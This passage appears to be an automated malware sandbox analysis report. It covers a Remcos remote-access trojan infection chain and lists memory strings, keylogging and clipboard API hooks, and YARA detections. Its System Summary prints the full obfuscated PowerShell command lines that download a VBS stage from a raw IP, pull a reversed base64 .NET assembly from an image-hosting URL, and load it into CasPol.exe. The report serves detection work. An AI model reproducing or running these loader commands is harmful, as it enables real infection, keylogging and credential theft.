                        Source: wscript.exe, 00000006.00000003.1746292531.0000000005DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1743748837.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1749746793.0000000005AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1746708576.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, seethebestthingsforgetmebackwithgoodnewsthings[1].tiff.3.dr, seethebestthingsforgetmebackwithgoodnewsthi.vbS.3.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
                        Source: wscript.exe, 00000006.00000003.1746388479.000000000359F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1746292531.0000000005DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1743748837.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1749746793.0000000005AF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1746708576.00000000059F1000.00000004.00000020.00020000.00000000.sdmp, seethebestthingsforgetmebackwithgoodnewsthings[1].tiff.3.dr, seethebestthingsforgetmebackwithgoodnewsthi.vbS.3.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
                        Source: powershell.exe, 00000003.00000002.1774693140.0000000004C3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: CasPol.exe, 0000000D.00000002.1948518347.00000000011F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                        Source: CasPol.exe, 0000000D.00000002.1948518347.00000000011F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                        Source: CasPol.exe, 0000000D.00000002.1949326180.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                        Source: CasPol.exeString found in binary or memory: https://login.yahoo.com/config/login
                        Source: powershell.exe, 00000003.00000002.1776250099.000000000575C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                        Source: powershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg
                        Source: powershell.exe, 00000007.00000002.1915796517.0000000004EE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpgt
                        Source: CasPol.exe, CasPol.exe, 0000000F.00000002.1941427909.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: CasPol.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00415B5E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_00415B5E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00415B5E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_00415B5E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00406E9F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004072B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00415B5E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_00415B5E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7652, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.4102227044.0000000001355000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4104782435.0000000002EAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.4102227044.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7652, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BD82 SystemParametersInfoW,12_2_0041BD82

                        System Summary

                        barindex
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000007.00000002.1915796517.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 7652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 7652, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"Jump to behavior
